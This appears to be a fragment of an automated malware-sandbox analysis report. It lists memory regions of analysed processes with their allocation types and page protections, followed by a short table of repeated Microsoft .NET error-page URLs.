heap
|
page read and write
|
||
|
180D6DC5000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
736E000
|
stack
|
page read and write
|
||
|
22448EDB000
|
heap
|
page read and write
|
||
|
22448C68000
|
heap
|
page read and write
|
||
|
22448F1A000
|
heap
|
page read and write
|
||
|
1CABC439000
|
trusted library allocation
|
page read and write
|
||
|
180F0CE9000
|
heap
|
page read and write
|
||
|
22446CFA000
|
heap
|
page read and write
|
||
|
A4F51FC000
|
stack
|
page read and write
|
||
|
A4F5A7E000
|
stack
|
page read and write
|
||
|
2802000
|
heap
|
page read and write
|
||
|
22448D24000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
559E000
|
stack
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
|
3DC0000
|
unclassified section
|
page execute and read and write
|
||
|
4EAD000
|
stack
|
page read and write
|
||
|
1CAD4890000
|
heap
|
page read and write
|
||
|
49DB4FE000
|
stack
|
page read and write
|
||
|
733C000
|
stack
|
page read and write
|
||
|
738C000
|
stack
|
page read and write
|
||
|
1C4FB4C0000
|
remote allocation
|
page read and write
|
||
|
362E000
|
heap
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
1C4F5C7B000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
3206000
|
heap
|
page read and write
|
||
|
1CABC3B0000
|
heap
|
page execute and read and write
|
||
|
31EE000
|
stack
|
page read and write
|
||
|
7FF848BBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4F5CB9000
|
heap
|
page read and write
|
||
|
329E000
|
stack
|
page read and write
|
||
|
2E12000
|
heap
|
page read and write
|
||
|
A4F56FE000
|
unkown
|
page readonly
|
||
|
2C79000
|
heap
|
page read and write
|
||
|
22446C00000
|
heap
|
page read and write
|
||
|
194B8890000
|
heap
|
page read and write
|
||
|
302E000
|
heap
|
page read and write
|
||
|
2E4F000
|
heap
|
page read and write
|
||
|
22448B30000
|
heap
|
page read and write
|
||
|
1CABA470000
|
heap
|
page read and write
|
||
|
3532FFF000
|
stack
|
page read and write
|
||
|
773F000
|
stack
|
page read and write
|
||
|
67FF000
|
stack
|
page read and write
|
||
|
28E0000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
54DE000
|
stack
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
302E000
|
heap
|
page read and write
|
||
|
1C4F5C5A000
|
heap
|
page read and write
|
||
|
1C4F6400000
|
heap
|
page read and write
|
||
|
27B2000
|
system
|
page execute and read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
6B3E000
|
stack
|
page read and write
|
||
|
2A30000
|
system
|
page execute and read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
22448EC4000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
180DA1CF000
|
trusted library allocation
|
page read and write
|
||
|
180F0A90000
|
heap
|
page read and write
|
||
|
180D6C90000
|
heap
|
page read and write
|
||
|
2790000
|
heap
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
22448B7A000
|
heap
|
page read and write
|
||
|
A4F5FFE000
|
unkown
|
page readonly
|
||
|
6801000
|
heap
|
page read and write
|
||
|
194BA83B000
|
trusted library allocation
|
page read and write
|
||
|
747E000
|
stack
|
page read and write
|
||
|
194BA7E2000
|
trusted library allocation
|
page read and write
|
||
|
22446E10000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
764C000
|
stack
|
page read and write
|
||
|
180F0DD0000
|
heap
|
page read and write
|
||
|
22446C55000
|
heap
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
22448C49000
|
heap
|
page read and write
|
||
|
1C4F5C7D000
|
heap
|
page read and write
|
||
|
3228000
|
heap
|
page read and write
|
||
|
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
|
29C0000
|
system
|
page execute and read and write
|
||
|
180D6EF0000
|
trusted library allocation
|
page read and write
|
||
|
559E000
|
stack
|
page read and write
|
||
|
521E000
|
stack
|
page read and write
|
||
|
194BA6E1000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB270000
|
trusted library allocation
|
page read and write
|
||
|
1CABC4EA000
|
trusted library allocation
|
page read and write
|
||
|
22446D08000
|
heap
|
page read and write
|
||
|
22446CFC000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
194B8990000
|
heap
|
page read and write
|
||
|
569E000
|
stack
|
page read and write
|
||
|
1C4F5CA7000
|
heap
|
page read and write
|
||
|
6801000
|
heap
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
71FD000
|
stack
|
page read and write
|
||
|
1CACC401000
|
trusted library allocation
|
page read and write
|
||
|
194B8B55000
|
heap
|
page read and write
|
||
|
2C2E000
|
heap
|
page read and write
|
||
|
2E80000
|
system
|
page execute and read and write
|
||
|
3C9E000
|
stack
|
page read and write
|
||
|
1C4F5D29000
|
heap
|
page read and write
|
||
|
180D6F20000
|
heap
|
page execute and read and write
|
||
|
1C4F6502000
|
heap
|
page read and write
|
||
|
22448B66000
|
heap
|
page read and write
|
||
|
1CABC3E0000
|
heap
|
page read and write
|
||
|
49DB473000
|
stack
|
page read and write
|
||
|
3612000
|
heap
|
page read and write
|
||
|
194D29E0000
|
heap
|
page execute and read and write
|
||
|
7FF848C96000
|
trusted library allocation
|
page execute and read and write
|
||
|
74DB000
|
stack
|
page read and write
|
||
|
22448BAA000
|
heap
|
page read and write
|
||
|
2E66000
|
heap
|
page read and write
|
||
|
1C4FB31B000
|
heap
|
page read and write
|
||
|
2C5F000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
6601000
|
heap
|
page read and write
|
||
|
22448B41000
|
heap
|
page read and write
|
||
|
6EC0000
|
trusted library allocation
|
page read and write
|
||
|
3206000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
4E6B000
|
unkown
|
page read and write
|
||
|
3222000
|
heap
|
page read and write
|
||
|
2989000
|
stack
|
page read and write
|
||
|
35FD000
|
stack
|
page read and write
|
||
|
1CAD44C7000
|
heap
|
page read and write
|
||
|
3261000
|
heap
|
page read and write
|
||
|
73BC000
|
stack
|
page read and write
|
||
|
180D8A91000
|
trusted library allocation
|
page read and write
|
||
|
1C4F5B70000
|
heap
|
page read and write
|
||
|
2C25000
|
heap
|
page read and write
|
||
|
180D6D60000
|
heap
|
page read and write
|
||
|
575D000
|
stack
|
page read and write
|
||
|
3DC7000
|
unclassified section
|
page execute and read and write
|
||
|
2E32000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
A4F5F7E000
|
stack
|
page read and write
|
||
|
3532D7E000
|
stack
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
753F000
|
stack
|
page read and write
|
||
|
3A12000
|
heap
|
page read and write
|
||
|
6740000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB30A000
|
heap
|
page read and write
|
||
|
7FF848C66000
|
trusted library allocation
|
page read and write
|
||
|
4D6B000
|
stack
|
page read and write
|
||
|
7FF848BB2000
|
trusted library allocation
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
180D6DDF000
|
heap
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
22446CD8000
|
heap
|
page read and write
|
||
|
180F10C6000
|
heap
|
page read and write
|
||
|
180F0C7A000
|
heap
|
page read and write
|
||
|
22448C98000
|
heap
|
page read and write
|
||
|
3701000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2BBD000
|
stack
|
page read and write
|
||
|
1CABA230000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
7FF848D62000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
194BA7FF000
|
trusted library allocation
|
page read and write
|
||
|
2C3F000
|
heap
|
page read and write
|
||
|
194D2D70000
|
heap
|
page read and write
|
||
|
22448F1A000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
194BA747000
|
trusted library allocation
|
page read and write
|
||
|
194BAB87000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
180D8E8F000
|
trusted library allocation
|
page read and write
|
||
|
194BA7F9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2E43000
|
heap
|
page read and write
|
||
|
194D2A10000
|
heap
|
page read and write
|
||
|
3227000
|
heap
|
page read and write
|
||
|
1C4FB300000
|
heap
|
page read and write
|
||
|
4FAD000
|
stack
|
page read and write
|
||
|
22448EB9000
|
heap
|
page read and write
|
||
|
3243000
|
heap
|
page read and write
|
||
|
194BA7F6000
|
trusted library allocation
|
page read and write
|
||
|
22448B32000
|
heap
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2C25000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
4F9B000
|
stack
|
page read and write
|
||
|
22448C51000
|
heap
|
page read and write
|
||
|
1C4F5D13000
|
heap
|
page read and write
|
||
|
B574FE000
|
stack
|
page read and write
|
||
|
180F1086000
|
heap
|
page read and write
|
||
|
796E000
|
stack
|
page read and write
|
||
|
3120000
|
unclassified section
|
page execute and read and write
|
||
|
1C4FB164000
|
trusted library allocation
|
page read and write
|
||
|
22446C5F000
|
heap
|
page read and write
|
||
|
3670000
|
heap
|
page read and write
|
||
|
506E000
|
stack
|
page read and write
|
||
|
1C4FB400000
|
trusted library allocation
|
page read and write
|
||
|
1CACC3F1000
|
trusted library allocation
|
page read and write
|
||
|
2E43000
|
heap
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
515C000
|
stack
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
2E79000
|
stack
|
page read and write
|
||
|
2C7F000
|
heap
|
page read and write
|
||
|
1C4F5CA1000
|
heap
|
page read and write
|
||
|
2D20000
|
system
|
page execute and read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
1C4F5C79000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
2EFE000
|
stack
|
page read and write
|
||
|
27F9000
|
stack
|
page read and write
|
||
|
2C89000
|
stack
|
page read and write
|
||
|
584C000
|
stack
|
page read and write
|
||
|
7FF848CA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4F6402000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
180E90A8000
|
trusted library allocation
|
page read and write
|
||
|
49DBA39000
|
stack
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
180F0C40000
|
heap
|
page read and write
|
||
|
49DBABF000
|
stack
|
page read and write
|
||
|
22448EC4000
|
heap
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
49DB879000
|
stack
|
page read and write
|
||
|
6201000
|
heap
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
A4F4FFE000
|
stack
|
page read and write
|
||
|
32E0000
|
system
|
page execute and read and write
|
||
|
4CDD000
|
stack
|
page read and write
|
||
|
1C4F651A000
|
heap
|
page read and write
|
||
|
2D01000
|
heap
|
page read and write
|
||
|
1CABC4FB000
|
trusted library allocation
|
page read and write
|
||
|
22448B61000
|
heap
|
page read and write
|
||
|
1C4F5C13000
|
heap
|
page read and write
|
||
|
180DA1BC000
|
trusted library allocation
|
page read and write
|
||
|
3C37000
|
unclassified section
|
page execute and read and write
|
||
|
3B00000
|
heap
|
page read and write
|
||
|
26E9000
|
stack
|
page read and write
|
||
|
3627000
|
heap
|
page read and write
|
||
|
2F01000
|
heap
|
page read and write
|
||
|
763C000
|
stack
|
page read and write
|
||
|
1C4F70A0000
|
trusted library allocation
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
3701000
|
heap
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
A4F5E7E000
|
stack
|
page read and write
|
||
|
3612000
|
heap
|
page read and write
|
||
|
B5787E000
|
stack
|
page read and write
|
||
|
353317E000
|
stack
|
page read and write
|
||
|
7FF848BB4000
|
trusted library allocation
|
page read and write
|
||
|
A4F57FB000
|
stack
|
page read and write
|
||
|
22448B81000
|
heap
|
page read and write
|
||
|
1CABA350000
|
heap
|
page read and write
|
||
|
180DA3B8000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
194D2AF0000
|
heap
|
page read and write
|
||
|
180D9E3F000
|
trusted library allocation
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
180F0C78000
|
heap
|
page read and write
|
||
|
2BAE000
|
stack
|
page read and write
|
||
|
3206000
|
heap
|
page read and write
|
||
|
2E25000
|
heap
|
page read and write
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
65CE000
|
stack
|
page read and write
|
||
|
6940000
|
trusted library allocation
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
2A39000
|
stack
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
1CABC4E4000
|
trusted library allocation
|
page read and write
|
||
|
1C4F5CFF000
|
heap
|
page read and write
|
||
|
365F000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
1C4F651A000
|
heap
|
page read and write
|
||
|
2C77000
|
heap
|
page read and write
|
||
|
1C4FB120000
|
trusted library allocation
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
2E27000
|
heap
|
page read and write
|
||
|
22448D24000
|
heap
|
page read and write
|
||
|
180D6DCB000
|
heap
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
A4F5EFE000
|
unkown
|
page readonly
|
||
|
7FF848D7A000
|
trusted library allocation
|
page read and write
|
||
|
549E000
|
stack
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
1C4F5C8F000
|
heap
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
3271000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
34FF000
|
stack
|
page read and write
|
||
|
22448BA8000
|
heap
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22448B39000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
194B88DA000
|
heap
|
page read and write
|
||
|
3532EFE000
|
stack
|
page read and write
|
||
|
2E5F000
|
heap
|
page read and write
|
||
|
2C2E000
|
heap
|
page read and write
|
||
|
17B7000
|
unclassified section
|
page execute and read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
1CABA37E000
|
heap
|
page read and write
|
||
|
180DA73E000
|
trusted library allocation
|
page read and write
|
||
|
3225000
|
heap
|
page read and write
|
||
|
180D8FB5000
|
trusted library allocation
|
page read and write
|
||
|
7C3C000
|
stack
|
page read and write
|
||
|
3606000
|
heap
|
page read and write
|
||
|
67CE000
|
stack
|
page read and write
|
||
|
22446DF0000
|
heap
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
3D9F000
|
stack
|
page read and write
|
||
|
6201000
|
heap
|
page read and write
|
||
|
7FF848F5B000
|
trusted library allocation
|
page read and write
|
||
|
541B000
|
stack
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
3B20000
|
heap
|
page read and write
|
||
|
1C4F6415000
|
heap
|
page read and write
|
||
|
2E4F000
|
heap
|
page read and write
|
||
|
22448B86000
|
heap
|
page read and write
|
||
|
22446D10000
|
heap
|
page read and write
|
||
|
522B000
|
stack
|
page read and write
|
||
|
3101000
|
heap
|
page read and write
|
||
|
1C4FB284000
|
heap
|
page read and write
|
||
|
180D6FA4000
|
heap
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
22448B39000
|
heap
|
page read and write
|
||
|
49DBC3E000
|
stack
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
3002000
|
heap
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
180D6CB0000
|
heap
|
page read and write
|
||
|
6EFD000
|
stack
|
page read and write
|
||
|
3532DFF000
|
stack
|
page read and write
|
||
|
63CE000
|
stack
|
page read and write
|
||
|
194BAF6E000
|
trusted library allocation
|
page read and write
|
||
|
22448C38000
|
heap
|
page read and write
|
||
|
6801000
|
heap
|
page read and write
|
||
|
323F000
|
heap
|
page read and write
|
||
|
1CAD43F0000
|
heap
|
page read and write
|
||
|
1C4F5B60000
|
heap
|
page read and write
|
||
|
194D2B01000
|
heap
|
page read and write
|
||
|
714C000
|
stack
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
732C000
|
stack
|
page read and write
|
||
|
2D00000
|
system
|
page execute and read and write
|
||
|
194BA6FB000
|
trusted library allocation
|
page read and write
|
||
|
3C57000
|
unclassified section
|
page execute and read and write
|
||
|
362E000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
A4F4CFE000
|
unkown
|
page readonly
|
||
|
1C4FB150000
|
trusted library allocation
|
page read and write
|
||
|
22448D26000
|
heap
|
page read and write
|
||
|
3025000
|
heap
|
page read and write
|
||
|
22446C27000
|
heap
|
page read and write
|
||
|
22448B35000
|
heap
|
page read and write
|
||
|
22446CFB000
|
heap
|
page read and write
|
||
|
180D6D80000
|
heap
|
page read and write
|
||
|
363F000
|
heap
|
page read and write
|
||
|
1C4F63C1000
|
trusted library allocation
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
1C4F6791000
|
trusted library allocation
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
1CABA343000
|
heap
|
page read and write
|
||
|
39D0000
|
heap
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
787F000
|
stack
|
page read and write
|
||
|
6400000
|
trusted library allocation
|
page read and write
|
||
|
3B10000
|
heap
|
page read and write
|
||
|
194D27F0000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
26A9000
|
stack
|
page read and write
|
||
|
22448CA7000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
63EE000
|
stack
|
page read and write
|
||
|
1CABA30B000
|
heap
|
page read and write
|
||
|
7FF848D6A000
|
trusted library allocation
|
page read and write
|
||
|
743F000
|
stack
|
page read and write
|
||
|
7FF848D92000
|
trusted library allocation
|
page read and write
|
||
|
A4F6E7E000
|
stack
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
22448D24000
|
heap
|
page read and write
|
||
|
1C4FB241000
|
heap
|
page read and write
|
||
|
1CABA4B0000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
22446C20000
|
heap
|
page read and write
|
||
|
4FCE000
|
stack
|
page read and write
|
||
|
1C4FB2BE000
|
heap
|
page read and write
|
||
|
35CE000
|
stack
|
page read and write
|
||
|
3606000
|
heap
|
page read and write
|
||
|
49DB5FF000
|
stack
|
page read and write
|
||
|
1C4FB0A0000
|
trusted library allocation
|
page read and write
|
||
|
2C5F000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
1C4F5CB3000
|
heap
|
page read and write
|
||
|
1CABA2C1000
|
heap
|
page read and write
|
||
|
3720000
|
heap
|
page read and write
|
||
|
2C3F000
|
heap
|
page read and write
|
||
|
B582CE000
|
stack
|
page read and write
|
||
|
3232000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB317000
|
heap
|
page read and write
|
||
|
325F000
|
heap
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
194D28B3000
|
heap
|
page read and write
|
||
|
194CA6E1000
|
trusted library allocation
|
page read and write
|
||
|
194B89F0000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
22448C58000
|
heap
|
page read and write
|
||
|
3643000
|
heap
|
page read and write
|
||
|
3412000
|
heap
|
page read and write
|
||
|
A4F5BFE000
|
unkown
|
page readonly
|
||
|
1C4F6D20000
|
trusted library section
|
page readonly
|
||
|
180F10D0000
|
heap
|
page read and write
|
||
|
2E27000
|
heap
|
page read and write
|
||
|
1CABA307000
|
heap
|
page read and write
|
||
|
180D6D89000
|
heap
|
page read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
1C4FB470000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
22446CFF000
|
heap
|
page read and write
|
||
|
22448B32000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
377F000
|
stack
|
page read and write
|
||
|
2E3F000
|
heap
|
page read and write
|
||
|
22448D24000
|
heap
|
page read and write
|
||
|
1C4FB150000
|
trusted library allocation
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
3812000
|
heap
|
page read and write
|
||
|
7FF848BCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
180D8EC9000
|
trusted library allocation
|
page read and write
|
||
|
3406000
|
heap
|
page read and write
|
||
|
49DB67D000
|
stack
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
2882000
|
system
|
page execute and read and write
|
||
|
25E2000
|
system
|
page execute and read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
1CABC434000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C21000
|
heap
|
page read and write
|
||
|
22448B9D000
|
heap
|
page read and write
|
||
|
7FF848BC2000
|
trusted library allocation
|
page read and write
|
||
|
4DAB000
|
stack
|
page read and write
|
||
|
343F000
|
stack
|
page read and write
|
||
|
A4F4BFD000
|
stack
|
page read and write
|
||
|
180D8EC5000
|
trusted library allocation
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1512000
|
unclassified section
|
page execute and read and write
|
||
|
50CE000
|
stack
|
page read and write
|
||
|
180F10BA000
|
heap
|
page read and write
|
||
|
32E2000
|
system
|
page execute and read and write
|
||
|
3625000
|
heap
|
page read and write
|
||
|
9C18705000
|
stack
|
page read and write
|
||
|
2C3F000
|
heap
|
page read and write
|
||
|
35AE000
|
stack
|
page read and write
|
||
|
180D6DC9000
|
heap
|
page read and write
|
||
|
2DFE000
|
stack
|
page read and write
|
||
|
22448B71000
|
heap
|
page read and write
|
||
|
180E8A91000
|
trusted library allocation
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
6AFE000
|
stack
|
page read and write
|
||
|
25E0000
|
system
|
page execute and read and write
|
||
|
2A02000
|
heap
|
page read and write
|
||
|
A4F5AFE000
|
unkown
|
page readonly
|
||
|
6980000
|
trusted library allocation
|
page read and write
|
||
|
1C4F650C000
|
heap
|
page read and write
|
||
|
B5777E000
|
stack
|
page read and write
|
||
|
2A62000
|
system
|
page execute and read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
49DB77E000
|
stack
|
page read and write
|
||
|
A4F55FB000
|
stack
|
page read and write
|
||
|
2C4F000
|
heap
|
page read and write
|
||
|
1C4F5D02000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
22448ECE000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
1C4F5B40000
|
heap
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
B583CD000
|
stack
|
page read and write
|
||
|
1CABC44D000
|
trusted library allocation
|
page read and write
|
||
|
565E000
|
stack
|
page read and write
|
||
|
1C4FB100000
|
trusted library allocation
|
page read and write
|
||
|
22448F30000
|
heap
|
page read and write
|
||
|
3006000
|
heap
|
page read and write
|
||
|
35331FB000
|
stack
|
page read and write
|
||
|
2839000
|
stack
|
page read and write
|
||
|
7FF848D92000
|
trusted library allocation
|
page read and write
|
||
|
194BA6D0000
|
heap
|
page execute and read and write
|
||
|
1C4F6C20000
|
trusted library allocation
|
page read and write
|
||
|
194B88D6000
|
heap
|
page read and write
|
||
|
A4F68FE000
|
unkown
|
page readonly
|
||
|
3000000
|
heap
|
page read and write
|
||
|
22446D07000
|
heap
|
page read and write
|
||
|
774C000
|
stack
|
page read and write
|
||
|
22448C78000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
787E000
|
stack
|
page read and write
|
||
|
2E32000
|
system
|
page execute and read and write
|
There are 1360 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|